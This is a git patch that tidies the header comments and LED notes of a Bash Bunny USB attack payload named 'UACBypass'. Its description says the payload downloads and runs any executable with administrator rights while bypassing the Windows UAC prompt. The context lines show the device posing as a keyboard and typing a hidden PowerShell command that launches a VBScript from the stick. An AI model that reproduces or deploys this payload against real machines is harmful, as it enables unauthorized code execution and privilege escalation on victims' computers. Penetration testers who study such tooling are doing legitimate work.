From 5e1dbdb4895d192f1b54121ecaea7337bd4882be Mon Sep 17 00:00:00 2001
From: Marc <foxtrot@realloc.me>
Date: Fri, 5 Jul 2019 08:12:17 +0100
Subject: [PATCH] Cleanup: exe_UACBypassD&E: Update Payload Header

---
 .../execution/exe_UACBypassD&E/payload.txt    | 23 +++++++++++++------
 1 file changed, 16 insertions(+), 7 deletions(-)

diff --git a/payloads/library/execution/exe_UACBypassD&E/payload.txt b/payloads/library/execution/exe_UACBypassD&E/payload.txt
index a37dc4a8..1d7fcc98 100644
--- a/payloads/library/execution/exe_UACBypassD&E/payload.txt
+++ b/payloads/library/execution/exe_UACBypassD&E/payload.txt
@@ -1,14 +1,24 @@
-# Title:         UACBypass
-# Author:        Skiddie
-# Version:       1.1
-# Target:        Windows
+# Title:        UACBypass
+# Author:       Skiddie
+# Version:      1.1
+# Target:       Windows
+# Attack Modes: HID, STORAGE 
 #
-# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10. The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges. However from what i am aware version 7,8 and 8.1 are still effected. Currently fastest download and execute for HID attacks to date. (with UAC bypass)
+# Description:  Download and executes any binary executable with administrator privileges WITHOUT prompting
+#               the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME
+#               in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10.
+#               The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges.
+#               However from what I am aware version 7,8 and 8.1 are still effected.
+#               Currently fastest download and execute for HID attacks to date. (with UAC bypass)
+#
+# LEDS:
+# Magenta: Starting
+# Green: Finished
 
 #Define your bunny storage stick name
 DRIVER_LABEL='BashBunny'
 
-#RED means starting
+#Magenta means starting
 LED SETUP
 
 #Gets File locations
@@ -17,7 +27,6 @@ GET SWITCH_POSITION
 #We are a keyboard
 ATTACKMODE HID STORAGE
 
-
 QUACK DELAY 500
 RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
 QUACK DELAY 1000